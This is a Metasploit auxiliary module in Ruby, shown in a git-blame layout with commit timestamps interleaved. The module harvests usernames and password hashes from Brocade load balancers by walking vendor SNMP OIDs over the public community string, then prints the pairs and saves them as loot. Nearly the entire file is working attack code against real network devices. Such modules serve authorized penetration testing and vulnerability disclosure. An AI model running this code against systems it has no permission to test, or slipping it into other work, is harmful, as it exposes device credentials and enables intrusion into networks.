2017-07-13 22:53:59 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2014-05-16 13:32:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Auxiliary
|
2014-05-16 13:32:46 +00:00
|
|
|
include Msf::Exploit::Remote::SNMPClient
|
|
|
|
include Msf::Auxiliary::Report
|
|
|
|
include Msf::Auxiliary::Scanner
|
|
|
|
|
|
|
|
def initialize
|
|
|
|
super(
|
|
|
|
'Name' => 'Brocade Password Hash Enumeration',
|
|
|
|
'Description' => %q{
|
|
|
|
This module extracts password hashes from certain Brocade load
|
|
|
|
balancer devices.
|
|
|
|
},
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string' ]
|
|
|
|
],
|
|
|
|
'Author' => ['Deral "PercentX" Heiland'],
|
|
|
|
'License' => MSF_LICENSE
|
|
|
|
)
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
def run_host(ip)
|
|
|
|
begin
|
|
|
|
snmp = connect_snmp
|
|
|
|
|
|
|
|
if snmp.get_value('sysDescr.0') =~ /Brocade/
|
|
|
|
|
|
|
|
@users = []
|
|
|
|
snmp.walk("1.3.6.1.4.1.1991.1.1.2.9.2.1.1") do |row|
|
|
|
|
row.each { |val| @users << val.value.to_s }
|
|
|
|
end
|
|
|
|
|
|
|
|
@hashes = []
|
|
|
|
snmp.walk("1.3.6.1.4.1.1991.1.1.2.9.2.1.2") do |row|
|
|
|
|
row.each { |val| @hashes << val.value.to_s }
|
|
|
|
end
|
|
|
|
|
2014-05-19 13:59:54 +00:00
|
|
|
print_good("#{ip} - Found user and password hashes:")
|
2014-05-16 13:32:46 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
credinfo = ""
|
|
|
|
@users.each_index do |i|
|
|
|
|
credinfo << "#{@users[i]}:#{@hashes[i]}" << "\n"
|
|
|
|
print_good("#{@users[i]}:#{@hashes[i]}")
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
#Woot we got loot.
|
|
|
|
loot_name = "brocade.hashes"
|
|
|
|
loot_type = "text/plain"
|
|
|
|
loot_filename = "brocade_hashes.txt"
|
|
|
|
loot_desc = "Brodace username and password hashes"
|
|
|
|
p = store_loot(loot_name, loot_type, datastore['RHOST'], credinfo , loot_filename, loot_desc)
|
|
|
|
|
|
|
|
print_status("Credentials saved: #{p}")
|
|
|
|
rescue ::SNMP::UnsupportedVersion
|
|
|
|
rescue ::SNMP::RequestTimeout
|
|
|
|
rescue ::Interrupt
|
|
|
|
raise $!
|
|
|
|
rescue ::Exception => e
|
2014-05-19 13:59:54 +00:00
|
|
|
print_error("#{ip} - Error: #{e.class} #{e}")
|
2014-05-16 13:32:46 +00:00
|
|
|
disconnect_snmp
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|